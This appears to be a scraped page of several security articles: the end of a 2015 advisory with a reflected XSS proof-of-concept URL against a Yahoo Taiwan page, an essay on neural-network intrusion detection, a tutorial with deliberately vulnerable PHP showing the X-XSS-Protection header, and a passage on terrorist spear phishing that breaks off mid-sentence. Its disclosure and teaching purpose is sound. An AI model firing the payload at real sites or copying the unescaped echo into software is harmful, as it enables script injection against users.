GET https://marketing.tw.campaign.yahoo.net/emarketing/searchMarketing/main/S04/B01?id=%22onmouseenter=%22confirm(document.domain) Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[-1] Mime Type[text/html] Request Headers: Host[marketing.tw.campaign.yahoo.net] User-Agent[Mozilla/5.0 (X11; Linux i686; rv:37.0) Gecko/20100101 Firefox/37.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] Cookie[_ga=GA1.5.1632823259.1428499428; s_pers=%20s_fid%3D66FF8BBF1D4DB480-10779CBEBDA57A64%7C1491837590956%3B%20s_vs%3D1%7C1428680990957%3B%20s_nr%3D1428679190961-New%7C1460215190961%3B; __qca=P0-870655898-1430085821750; _ga=GA1.2.1969841862.1430892005] X-Forwarded-For[8.8.8.8] Connection[keep-alive] Response Headers: Date[Wed, 06 May 2015 12:19:05 GMT] Server[ATS] X-Powered-By[PHP/5.3.27] Content-Type[text/html] Age[0] Connection[close] Via[http/1.1 leonpc (ApacheTrafficServer/4.2.0 [c sSf ])] Reference(s): https://marketing.tw.campaign.yahoo.net https://marketing.tw.campaign.yahoo.net/emarketing/searchMarketing/ https://marketing.tw.campaign.yahoo.net/emarketing/searchMarketing/main/S04/B01?id= Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse and encode of the vulnerable id value in the emarketing service application of yahoo. Restrict the input and disallow special chars or script code tags to prevent further injection attacks. Security Risk: ============== The security risk of the client-side cross site scripting web vulnerability in the tw yahoo application is estimated as medium. (CVSS 3.3) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Hadji Samir [s-dz@hotmail.fr] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source
-
Intrusion systems have been the subject of considerable research for decades to improve the inconsistencies and inadequacies of existing methods, from basic detectability of an attack to the prevention of computer misuse. It remains a challenge still today to detect and classify known and unknown malicious network activities through identification of intrusive behavioral patterns (anomaly detection) or pattern matching (misuse or signature-based detection). Meanwhile, the number of network attack incidents continues to grow. Protecting a computer network against attacks or cybersecurity threats is imperative, especially for companies that need to protect not only their own business data but also sensitive information of their clients as well as of their employees. It is not hard to see why even just one breach in data security from a single intrusion of a computer network could wreak havoc on the entire organization. Not only would it question the reliability of the networks’ infrastructure, but it could also seriously damage the business’s reputation. An organization’s first defense against breaches is a well-defined corporate policy and management of systems, as well as the involvement of users in protecting the confidentiality, integrity, and availability of all information assets. Security awareness training is a baseline for staff to gain the knowledge necessary to deter computer breaches and viruses, mitigate the risks associated with malicious attacks, and defend against constantly evolving threats. Users’ awareness and strict IT policies and procedures can help defend a company from attacks, but when a malicious intrusion is attempted, technology is what helps systems administrators protect IT assets. When it comes to perimeter data security, traditional defense mechanisms should be in layers: firewalls, intrusion detection systems (IDS) and intrusion prevention systems (IPS) can be used. Research and new developments in the field of IDPS (Intrusion Detection and Prevention System) prove different approaches to anomaly and misuse detection can work effectively in practical settings, even without the need of human interaction/supervision in the process. Several case studies emphasize that the use of Artificial Neural Networks (ANN) can establish general patterns and identify attack characteristics in situations where rules are not known. A neural network approach can adapt to certain constraints, learn system characteristics, recognize patterns and compare recent user actions to the usual behavior; this allows resolving many issues/problems even without human intervention. The technology promises to detect misuse and improve the recognition of malicious events with more consistency. A neural network is able to detect any instances of possible misuse, allowing system administrators to protect their entire organization through enhanced resilience against threats. This article explores Artificial Intelligence (AI) as a means to solve the difficulties in identifying intrusions of insecure networks, such as the Internet, and discusses the use of artificial neural networks (ANN) for effective intrusion detection to detect patterns that separate attacks from genuine traffic. It will clarify why ANN technology offers a promising future in the identification of instances of misuse against computer systems. Furthermore, the article will also point out the different directions in which research on neural networks concentrate and the developments and expected future in the intrusion detection and prevention (IDPS) field. IDS & IPS Technology: Detection and Prevention Techniques With computer intrusions—the unauthorized access or malicious use of information resources—becoming more common and a growing challenge to overcome, IT professionals have come to rely more on detection and prevention technologies to protect availability of business-critical information resources and to safeguard data confidentiality and integrity. IDS tools sniff network packet traffic in search of interferences from external sources and can spot a hacker attempting to gain entry; they are designed to detect threats, misuse or unauthorized access to a system or network and are able to analyze system events for signs of incidents. Using both hardware and software, IDSs can detect anything that is suspicious either on a network or host; they then create alarms that system administrators can review to spot possible malicious entries. Intrusion detection systems (IDS) can be classified as: Host based or Network based with the former checking individual machines’ logs and the latter analyzing the content of network packets; Online or Offline, capable of flagging a threat in real-time or after the fact to alert of a problem; Misuse-based or Anomaly-based, either specifically checking a deviation from a routine behavior or comparing activities with normal, known attackers’ behavior. While an IDS is designed to detect attacks and alert humans to any malicious events to investigate, an IPS is used to prevent malicious acts or block suspicious traffic on the network. There are four different types of IPS: network-based intrusion prevention system (NIPS) that looks at the protocol activity to spot suspicious traffic; wireless intrusion prevention system (WIPS) that analyzes wireless networking protocols and is so important in the BYOD and mobile-centric world; network behavior analysis (NBA) that can spot attacks that create unusual traffic, such as distributed denial of service (DDoS) attacks, and it can use anomaly-based detection and stateful protocol analysis; and host-based intrusion prevention system (HIPS) that can be installed on single machines and can use signature-based and anomaly-based methods to detect problems. IDS and IPS tools are often used concurrently, as they are not mutually exclusive. Thus IDPS can offer twice the protection. Security technologist and chief technology officer of Co3 Systems Bruce Schneier mentions, “Good security is a combination of protection, detection, and response.” That just happens to be what IDPS does; it is deployed for information gathering, logging, detection and prevention. These tools provide threat identification capabilities, attack anticipation, and more. Having a network-based IDPS (NIDPS) with signature-based and anomaly-based detection capabilities allows inspecting the content of all the traffic that traverses the network. NIDPS are essential network security appliances that help in maintaining the security goals. They are highly used, as Indraneel Mukhopadhyay explains, for “identifying possible incidents, logging information about them, attempting to stop them, and reporting them to security administrators.” The all familiar Snort—an open-source NIDPS—is a highly used free threat intelligence program, created by Martin Roesch in 1998, that is capable of real-time traffic analysis and packet logging; it utilizes a rules-based detection engine to look for anomalous activity. What makes it a popular choice is its easy-to-use rule language. It can protect even the largest enterprise networks. Snort is an IP-centric program; administrators can view system security logs and find any irregularities or issues relating to things such as improper access patterns. Snort is said to be the most widely deployed intrusion prevention system in the world. Deploying IDS and IPS devices requires a specialized skill set to ensure it properly identifies abnormal traffic and alert network administrator as needed. Along with proper configuration to a predefined rule set, provided by the administrator, these devices need to be fine-tuned (as new threats are discovered) in order to weed out false positives and be adjusted to specific network parameters (when the infrastructure has been altered) to maximize accuracy. Once the type of IDPS technology has been selected, it is key to determine how many components (sensors, agents) will need to be deployed to function accurately to capture security issues, process events and alert appropriate personnel of suspicious activities. Direct network monitoring of the IDPS components like inline sensors between the firewall and the Internet border router is essential to achieve detection and prevention of malicious activity, such as denial of service attacks committed by an intruder. IDPS agents installed on endpoints can not only monitor the current network but also can assign appropriate priorities to alerts. Past and Present of IDSs IDPSs are able to monitor the events of interests on the systems and/or networks and are then able to identify possible incidents, log information about them, and attempt to stop common attacks and report them to security administrators. In the past, Intrusion Detection and Prevention (IDPS) has either been signature-based (able to check activity against known attackers’ patterns, the signature), anomaly-based (also referred to as heuristic, that alerts when traffic and activity are not normal), or based on stateful protocol analysis that looks at the “state” in a connection and “remembers” significant events that occur. These methods are effective but do have some downfalls. IDSs are known to have two main problems: the number of alarms generated and the need for tuning. Anomaly-based detection, for example, needs training and if issues arise during the training period a malicious behavior might be “learned” as legitimate by the system; it’s also prone to many false positives. When analysis is based on rules provided by a vendor or an administrator, instead, updates must be frequent to ensure the proper functioning of the system. The number of alarms generated (many being false) can overwhelm system security managers and prevent them from quickly identifying real ones. The continuous tuning of the intrusion to detect the slightest of variances and training required in order to maintain sufficient performance remains an issue. With a growing number of intrusion events, there is the need to use innovative intrusion detection techniques for critical infrastructure network protection. Research has concentrated on Artificial Neural Networks (ANNs) that can provide a more flexible approach to intrusion prevention in terms of learning. As the need for reliable automatic IDPS builds up, for it to gain acceptance as a viable alternative, it needs to function at a sufficient level of accuracy. That is where Neural Networks and Artificial Intelligence can play an effective role in the improvement of ID systems with the ability to learn from previous episodes of intrusion to identify new types of attack with less analyst interaction with the ID itself. In fact, information system experts believe that Artificial Intelligence (AI) can provide significant improvements to IDS/IPS systems, especially in terms of effectiveness and decreased false positive/negative rates, a major issue in intrusion management. Next Generation Intrusion Detection and Prevention (IDPS) Due to a new generation of hackers that are better organized and equipped than in the past, to get past perimeter security, it is clear that a different approach is required, says Joshua Crumbaugh, lead penetration tester at Tangible Security, Inc., NagaSec. As per the DRAFT Special Publication 800-94 Revision 1, Guide to …, the Next-Generation IDPS for host and network-based deployment options will have automated identification, location, isolation, and resolution of threats in real-time. A GCN staff post, “What’s next in cybersecurity automation,” provides insight on the Enterprise Automated Security Environment (EASE) concept for “shared situational awareness in cyber-relevant time” and, with the concerted efforts of government and private sector interests, the concept may foster continuous innovation for cyberspace defense across the board. Other than EASE, the US Government has already evaluated other options to defend against cyber-attacks that mine homeland security. It pursued, for example, as a project to develop a smart network of sensors (named Einstein) to detect cyber-attacks against critical infrastructures. IPS/IDS has changed, as research shows, with AI techniques that have improved IDSs by making them capable of detecting both current and future intrusion attacks while triggering fewer false positives and negatives. New ANNIDS (Neural networks applied to IDS) techniques have been able to improve the way detection systems are trained to recognize patterns, conduct problem solving and fault diagnosis too. In today’s world, there is the need “for building high-speed, reliable, robust and scalable ANN-based network intrusion detection and prevention system that is highly useful for [humankind] and organizations,” Mukhopadhyay says. Neural network based AIs are able to discover emergent collective properties that are too complex to be noticed by either humans or other computer techniques. AI based techniques are used to classify behavior patterns of a user and an intruder in a way that minimizes false alarms from happening, explains Archit Kumar, India, an M.Tech Student, Department of CSE, in a research paper for IJARCSMS. IDS based on ANN uses algorithms that can analyze the captured data and judge whether the data is intrusion or not by means of behavioral analysis of the neural computation during both learning and recall. Although ANNIDS’ main drawbacks are lower detection precision for low-frequent attacks, and weaker detection stability in the beginning, it is a suitable solution for intrusion detection and network security, says Suresh Kashyap, an Indian research scholar at the Dr. C.V. Raman University. He adds that ANNIDS can be trained and tested by customized datasets enabling it to identify known and unknown (new) attacks with increasing accuracy when other methods fail. Current AI techniques for improving automation of the intrusion detection process are not easily deployable in real life, yet many experiments and tests have been carried out with results showing ANNs capable of detecting intrusive activity in a distributed environment to provide local “threat-level” monitoring of computer DDoS attacks before the successful completion of an intrusion. ANN s are great in terms of learning capabilities and effectiveness in capturing anomalies in activities, but also have some significant downfalls, such as, for example, the requirement of high computational resources. Researchers have been working on resolving this issue by trying to find a way to help ANN systems process info faster and effectively. An approach using AI techniques combined with genetic algorithms and fuzzy logic, for instance, proved well suited for detecting malicious behavior in distributed computer systems. Research concentrated also on the possibility to clustered data in subgroups using fuzzy clustering to use then a different ANN on each set. Results are obtained faster and are then aggregated to have a complete picture. Another method explored more recently is deploying new ANN-based intelligent hybrid IDS models for anomaly detection that involve network- and host-based technologies under a single management console. These are also applicable to many environments: from Grid and Cloud Computing to mobile and network computers. In such an architecture, a Distributed Intrusion Detection System (DIDS) that relies on network and host based sensors is apt to increase the efficiency of the system yielding fast results of abnormal data determined by multiple heterogeneous recognition engines and management components to solve security issues. Conclusion Whether it is through a hybrid IDS using honey pot technology and anomaly detection or artificial neural network (ANN) based IDSs techniques, it is essential to detect and prevent attacks immediately as attempted. Information security practitioners suggest organizations are confident that their security control mechanism in place are sufficient enough for the protection of computer data and programs, but apparently, as per the PwC findings from the 2014 US State of Cybercrime Survey, a good majority of them fail to assess for threats or place emphasis on prevention mechanisms. What’s more, they also lack the ability to diagnose and troubleshoot less sophisticated attacks and have yet to consider where IDS/IPS fits in their security plan. Both system solutions work together and form an integral part of a robust network defense solution. As per the annual Worldwide Infrastructure Security Report (WISR) that provides insight into the Global Threat Landscape, organizations will face even more concerns regarding APT, so they ought to step up their network security defenses with near-real-time intrusion detection to defend critical data and applications from today’s sophisticated attacks. The new reality in IT security is that network breaches are inevitable, and the ability to monitor and control access and behavior patterns and misuse relies upon intrusion detection and prevention methods to be more quickly identified and more effectively addressed. An IDS/IPS is a must-have device; an ANN model based on ESNN learning patterns and classifying intrusion data packets is an effective approach. The main advantages of the ANNs over traditional IDSs are their abilities to learn, classify, process information faster, as well as their ability of self-organization. For these reasons, Neural Networks can increase the accuracy and efficiency of IDSs and AI techniques can improve IDS/IPS effectiveness. References Brecht, D. (2010, April 15). Network Intrusion Detection Systems: a 101. Retrieved from What is a Network Intrusion Detection System (NIDS)? Compare Business Products (2014, March 18). Security: IDS vs. IPS Explained. Retrieved from Security: IDS vs. IPS Explained | Reviews, Comparisons and Buyer's Guides GCN. (2014, December 9). What’s next in cybersecurity automation. Retrieved from What’s next in cybersecurity automation -- GCN Infosecurity Magazine. (2011, October 21). Small enterprises are suffering more intrusions, survey finds. Retrieved from Small enterprises are suffering more intrusions, survey finds - Infosecurity Magazine InfoSight Inc. (n.d). Intrusion Detection (IDS) & Intrusion Prevention (IPS). Retrieved from Intrusion Detection (IDS) & Intrusion Prevention (IPS) – InfoSight Inc Kashyap, S. (2013, May). Importance of Intrusion Detection System with its Different approaches. Retrieved from http://www.ijareeie.com/upload/may/24_Importance.pdf Kumar, A. (2014, May). Intrusion detection system using Expert system (AI) and […]. Retrieved from http://www.ijarcsms.com/docs/paper/volume2/issue5/V2I5-0064.pdf Mukhopadhyay, I. (2014). Hardware Realization of Artificial Neural Network Based Intrusion Detection & Prevention System. Retrieved from http://file.scirp.org/Html/3-7800230_50045.htm Onuwa, O. (2014, November 29). Improving Network Attack Alarm System: A Proposed Hybrid Intrusion Detection System Model. Retrieved from http://www.computerscijournal.org/vol7no3/improving-network-attack-alarm-system-a-proposed-hybrid-intrusion-detection-system-model/ Saied, A. (n.d.). Artificial Neural Networks in the detection of known and unknown DDoS attacks: Proof-of-Concept. Retrieved from http://www.inf.kcl.ac.uk/staff/richard/PAAMS-WASMAS_2014.pdf Surana, S. (2014). Intrusion Detection using Fuzzy Clustering and Artificial Neural Network. Retrieved from http://www.wseas.us/e-library/conferences/2014/Gdansk/FUNAI/FUNAI-32.pdf Vieira, K. (2010, August). Intrusion Detection for Grid and Cloud Computing. Retrieved from http://www.inf.ufsc.br/~westphal/idscloud.pdf Wang, L. (n.d.). Artificial Neural Network for Anomaly Intrusion Detection. Retrieved from https://www.cs.auckland.ac.nz/courses/compsci725s2c/archive/termpapers/725wang.pdf Zakaria, O. (n.d.). Identify Features and Parameters to Devise an Accurate Intrusion Detection System Using Artificial Neural Network. Retrieved from http://www.academia.edu/2612588/Identify_Features_and_Parameters_to_Devise_an_Accurate_Intrusion_Detection_System_Using_Artificial_Neural_Network Zamani, M. (2013, December 8). Machine Learning Techniques for Intrusion Detection. Retrieved from http://arxiv.org/pdf/1312.2177.pdf Source
-
In the previous article, we have seen how we can defend against click jacking attacks using the X-Frame-Options header. In this article, we will discuss another header: X-XSS-Protection. Similar to the previous article, we will first see the vulnerable code and then attempt to defend against the attack using this header. Setup is the same as the previous article. Once the user logs in, there will be a little dashboard where the user can search for some values. Below is the code used to implement the functionality. Vulnerable code: <?php session_start(); session_regenerate_id(); if(!isset($_SESSION['admin_loggedin'])) { header('Location: index.php'); } if(isset($_GET['search'])) { if(!empty($_GET['search'])) { $text = $_GET['search']; } else { $text = "No text Entered"; } } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Admin Home</title> <link rel="stylesheet" href="styles.css"> </head> <body> <div id="home"><center> </br><legend><text id=text><text id="text2">Welcome to Dashboard...</text></br></br> You are logged in as: <?php echo $_SESSION['admin_loggedin']; ?> <a href="logout.php">[logout]</a></text></legend></br> <form action="" method="GET"> <div id="search"> <text id="text">Search Values</text><input type="text" name="search" id="textbox"></br></br> <input type="submit" value="Search" name="Search" id="but"/> <div id="error"><text id="text2">You Entered:</text><?php echo $text; ?></div> </div> </form></center> </div> </body> </html> If you clearly notice in the above code, the application is not sanitizing the user input before it echoes back and thus leaves it vulnerable. Currently, there is no additional protection mechanism implemented to prevent this. We can even have a quick look at HTTP headers. HTTP HEADERS HTTP/1.1 200 OK Date: Sun, 12 Apr 2015 14:53:37 GMT Server: Apache/2.2.29 (Unix) mod_fastcgi/2.4.6 mod_wsgi/3.4 Python/2.7.8 PHP/5.6.2 mod_ssl/2.2.29 OpenSSL/0.9.8y DAV/2 mod_perl/2.0.8 Perl/v5.20.0 X-Powered-By: PHP/5.6.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=f94dc2ac2aa5763c636f9e75365102b5; path=/ Content-Length: 820 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 So, let us execute some simple JavaScript in the search box and see if it gets executed. Well, it seems the script is not getting executed. Let us inspect the error console and see what’s happening. It is clear from the console that XSS Auditor in Google Chrome is preventing execution of the script. Additionally, it says that it is enabled because there is no X-XSS-Protection or Content-Security-Policy header sent by the server. We can customize this filtering by enabling X-XSS-Protection or Content-Security-Policy headers. Let us first try to disable the protection using the following line. header("X-XSS-Protection: 0"); After adding the above line of code to our page, the page should look as shown below. <?php session_start(); session_regenerate_id(); header("X-XSS-Protection: 0"); if(!isset($_SESSION['admin_loggedin'])) { header('Location: index.php'); } if(isset($_GET['search'])) { if(!empty($_GET['search'])) { $text = $_GET['search']; } else { $text = "No text Entered"; } } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Admin Home</title> <link rel="stylesheet" href="styles.css"> </head> <body> <div id="home"><center> </br><legend><text id=text><text id="text2">Welcome to Dashboard...</text></br></br> You are logged in as: <?php echo $_SESSION['admin_loggedin']; ?> <a href="logout.php">[logout]</a></text></legend></br> <form action="" method="GET"> <div id="search"> <text id="text">Search Values</text><input type="text" name="search" id="textbox"></br></br> <input type="submit" value="Search" name="Search" id="but"/> <div id="error"><text id="text2">You Entered:</text><?php echo $text; ?></div> </div> </form></center> </div> </body> </html> Well! If we now load the page, it pops up an alert box as shown below. Let us also check the same page in Firefox, which pops up an alert box as expected. Now, let us change the value of this header to 1 and try again in the browser. header("X-XSS-Protection: 1"); If you observe the HTTP headers, you can notice that the header has been enabled. HTTP HEADERS: HTTP/1.1 200 OK Date: Sun, 12 Apr 2015 14:54:42 GMT Server: Apache/2.2.29 (Unix) mod_fastcgi/2.4.6 mod_wsgi/3.4 Python/2.7.8 PHP/5.6.2 mod_ssl/2.2.29 OpenSSL/0.9.8y DAV/2 mod_perl/2.0.8 Perl/v5.20.0 X-Powered-By: PHP/5.6.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=8dfb86b13ec9750d1f1afdfc004f5042; path=/ X-XSS-Protection: 1 Content-Length: 820 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Well, if we now execute the same vulnerable URL, the script won’t be executed. Let us look at the Chrome’s console and see what happened. As we can see in the above console, the script is not executed because of the header we sent. header("X-XSS-Protection: 1"); The above header, when sent with no additional arguments, just stops the script from its execution. We can also add an additional value to this header as shown below. header("X-XSS-Protection: 1; mode=block"); When this header is sent, the browser doesn’t execute the script and shows a blank document to the user as shown below. Below are the headers sent: HTTP/1.1 200 OK Date: Mon, 13 Apr 2015 09:59:22 GMT Server: Apache/2.2.29 (Unix) mod_fastcgi/2.4.6 mod_wsgi/3.4 Python/2.7.8 PHP/5.6.2 mod_ssl/2.2.29 OpenSSL/0.9.8y DAV/2 mod_perl/2.0.8 Perl/v5.20.0 X-Powered-By: PHP/5.6.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=729f2f716310ccfe353c81ced1602cf0; path=/ X-XSS-Protection: 1; mode=block Content-Length: 846 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Though it works fine with popular browsers like Internet Explorer, Chrome and Safari, Firefox doesn’t support this header and still we can see the alert box popping up as shown below. So, this header should be used to have defense in depth in place, but it can’t protect the site completely and thus developers have to make sure they have additional mitigation controls implemented. Source
-
Introduction: Spear phishing attacks Spear phishing and its evolutions like the watering hole attack represent one of the most insidious attack techniques adopted by the majority of threat actors in cyber space. According to the experts at Trend Micro security firm, spear phishing is the attack method used in some 91 percent of cyber attacks. Differently from a common phishing attack, in the spear phishing attack scenario bad actors target a subset of people, usually the employees of an organization, members of an association or visitors of a particular website. The purpose of the attack is to collect personal information and other sensitive data that would be used later in further attacks against the victims. The attack vector is usually an email message that appears to come from a legitimate entity, that requests an action from the victims. There are numerous variants of spear phishing: some phishing emails include malicious links to websites controlled by attackers, while others include a malicious attachment that infects the victim’s system. In recent attacks operated by several APT groups, the malicious email sent to the victims encouraged users to read Word or PDF documents that were specifically crafted to exploit vulnerabilities in the web browser in order to compromise the host. Analyzing data related to the cyber attacks that occurred in the last five years, it is easy to deduct that spear phishing represents the easiest way for an attacker to compromise enterprises and organizations of any size. The “Operation Aurora” attack (2010), the hack (2011), the Target breach (2013), and the most recent Sony Entertainment (2014) and the cyber attacks operated by Operation Carbanak and the Syrian Electronic Army are just a few examples of offensives that relied on spear phishing as an infection method. The key to the success of a spear phishing attack is that it relies on the weakest link of a security chain, humans. Another characteristic of a spear phishing attack is that the content shared with the victims of an attack is usually highly customized to the recipient to increase the chance of exploitation. Social engineering techniques entice users to click on malicious attachments and links by suggesting they may be topics of interest for the victims. Spear phishing and terrorism Terrorism is defined as violent conduct or the threat of violent acts conducted with the purpose to create a climate of terror and damage the critical operations of a nation. We must consider that today’s society heavy relies on technologies, the majority of services that we access every day strongly depend on IT systems. This is particularly evident in some industries like defense, energy, telecommunications and banking. For this reason terrorism is enlarging its spectrum of action and is targeting IT services whose destruction can have the effects of an old style terrorist attack. Terrorists have several ways to use technology for their operations, and once again, the spear phishing methodology could help them to realize their plans. Let’s imagine together some attack scenarios and the way a spear phishing attack could help a terrorist to hit the collective. Terrorists can directly target the services compromising their operations. A number of services are based on sophisticated infrastructure managed by humans. By interrupting them, it is possible to create serious damage to the victims and to the population. Let’s imagine a cyber attack against a bank that will cause the interruption of the operations of a financial institution, or a cyber attack against telecommunication systems of a national carrier. Suddenly the users will have no opportunity to withdraw money from their bank accounts, or they will be isolated due to the interruption of the service of the telecommunications carrier; both events would create panic among the population. Again, let’s think to cyber attacks against the transmission of a broadcaster or an energy grid of a state. Also in this case, the impact on the public order could be dramatic. All the systems that could be targeted by the attacks mentioned rely on both an IT system and a human component, and human operators are the element that could be targeted by terrorists using spear phishing attacks that could give them the opportunity to infiltrate the computer systems and move laterally inside the systems of the service provider. Unfortunately, the attack scenarios described are feasible, and attacks with similar consequences on the final services have already occurred. In those cases, the threat actors were state-sponsored hackers and cyber criminals that mainly operated for cyber espionage and for profit, but in the case of a terrorist attack, the final goal is more dangerous: the destruction itself. Terrorists can run a spear phishing attack for information gathering Information gathering through a spear phishing technique is the privileged choice for a terrorist. Cells of terrorists could use this attack method to spread malware and hack into computers and mobile phones of persons of interest with the intent to collect information on their social network and related to the activities they are involved in. Spear phishing could allow terrorists to collect information on a specific target or to access information related to investigation on members of the group. Let’s imagine a spear phishing attack on personnel of a defense subcontractor that could give the terrorist precious information about security measures in place in a specific area that the terrorist cell intends to attack. Online scams to finance activities of cells Spear phishing attacks could be used by terrorists to finance small operations. The attacks can be carried out with the intent to conduct online frauds and the proceeds, albeit modest, may also finance the purchase of weapons and false documents in the criminal underground. The terrorists operate online purchases that enable cells to avoid controls exercised by the intelligence agencies in the area. Terrorists groups become more tech-savvy Terrorist groups like ISIS and Al Qaeda have become more tech-savvy, and among their members there are also security experts with a deep knowledge of hacking techniques, including social engineering and spear phishing. Spear phishing is the privileged technique to steal sensitive information from corporate or government entities that the terrorists plan to hit. Unfortunately, the skills necessary to hack SCADA systems of a critical infrastructure are less and less specialized, because on the Internet it is easy to find numerous exploits ready for use. Very often, it is sufficient to know the credentials of a VPN service used to access the SCADA system remotely in order to hack it. Terrorists are aware of this, and spear phishing attacks against the staff that manages the systems in the critical infrastructure would provide all the necessary information to attack the internal network structure and launch the exploit to hack the SCADA systems. Resuming, a spear phishing attack could give an attacker the information necessary to damage processes of a nuclear power plant, a water facility systems or a satellite systems. Another factor that incentivizes the use of spear phishing attacks by terrorists is that this kind of attack for information gathering could be conducted remotely without arousing suspicion. ISIS operates spear phishing attacks against a Syrian citizen media group The demonstration that the terrorist group of the Islamic State in Iraq and Syria (ISIS) is using spear phishing techniques against opponents was provided by Citizen’s Lab, which published a detailed report on a hacking campaign run by the members of the organization against the Syrian citizen media group known as Raqqah is being Slaughtered Silently (RSS). The hackers operating for ISIS run the spear phishing campaign to unmask the location of the militants of the RSS with the intent to kill them. The Syrian group RSS is an organization that in several cases has criticized the abuses made by ISIS members during the occupation of the city of Ar-Raqqah, located in northern Syria. “A growing number of reports suggest that ISIS is systematically targeting groups that document atrocities, or that communicate with Western media and aid organizations, sometimes under the pretext of finding ‘spies’.” ISIS members are persecuting local groups searching for alleged spies of Western governments. The spear phishing campaign run by the terrorists allowed the members of ISIS to serve a malware to infect the computers of the opponents and track them. The experts at Citizen’s Lab uncovered the spear phishing campaign managed to target the RSS members. “Though we are unable to conclusively attribute the attack to ISIS or its supporters, a link to ISIS is plausible,” Citizen’s Lab noted. “The malware used in the attack differs substantially from campaigns linked to the Syrian regime, and the attack is focused against a group that is an active target of ISIS forces.” The malicious emails contain a link to a decoy file, which is used by attackers to drop a custom spyware on the victim’s machine. “The unsolicited message below was sent to RSS at the end of November 2014 from a Gmail email address. The message was carefully worded, and contained references specific to the work and interests of RSS,” states the report. “The custom malware used in this attack infects a user who views the decoy “slideshow,” and beacons home with the IP address of the victim’s computer and details about his or her system each time the computer restarts.” The researchers at Citizen’s Lab have noticed that the malicious code served through the spear phishing campaign is different from the Remote Access Trojans used by the hackers backed by the Syrian Government. Figure 1 – Slideshow.zip file used by ISIS members in the spear phishing campaign One of the principal differences is related to the control infrastructure. The members of the ISIS used an email account to gather information from compromised machines. “Unlike Syrian regime-linked malware, it contains no Remote Access Trojan (RAT) functionality, suggesting it is intended for identifying and locating a target,” said CL. “Further, because the malware sends data captured by the malware to an email address, it does not require that the attackers maintain a command-and-control server online. This functionality would be especially useful to an adversary unsure of whether it can maintain uninterrupted Internet connectivity.” Western intelligence collected evidence of the presence of hackers among the members of ISIS. According to some experts, members of ISIS are already working to secure communications between ISIS members and supporting the group to spread propaganda messages avoiding detection. “In addition, ISIS has reportedly gained the support of at least one individual with some experience with social engineering and hacking: Junaid Hussain (aka TriCk), a former member of teamp0ison hacking team. While Mr. Hussain and associates have reportedly made threats against Western governments, it is possible that he or others working with ISIS have quietly supported an effort to identify the targeted organization, which is a highly visible thorn in the side of ISIS.” ISIS members are targeting many other individuals with spear phishing attacks – for example, it has been documented that it targeted Internet cafés in Syria and Iraq that are used by many hacktivits. “Reports about ISIS targeting Internet cafés have grown increasingly common, and in some cases reports point to the possible use of keyloggers as well as unspecified IP sniffers to track behavior in Internet cafes,” Citizen’s Lab reported. Citizen’s Lab seems to be confident of the involvement of a non state-actors in the attack, and ISIS is a plausible suspect. “After considering each possibility, we find strong but inconclusive circumstantial evidence to support a link to ISIS,” CL said. “Whether or not ISIS is responsible, this attack is likely the work of a non-regime threat actor who may be just beginning to field a still-rudimentary capability in the Syrian conflict. The entry costs for engaging in malware attacks in a conflict like the Syrian Civil War are low, and made lower by the fact that the rule of law is nonexistent for large parts of the country.” The Energy industry – A privileged target for a terrorist attack The energy industry is probably the sector more exposed to the risk of terrorist attacks, as energy grids, nuclear plants, and water facilities represent a privileged target for terrorists. Spear phishing attacks could allow terrorists hit systems in the critical infrastructure to destroy the operations or could allow bad actors to gather sensitive information to organize a terrorist attack. The spear phishing campaign could be run against the personnel of a targeted infrastructure to gather sensitive information on defense mechanisms in place and ways to breach them. The last report issued by the DHS’s Industrial Control Systems Cyber Emergency Response Team (ICS-CERT), the 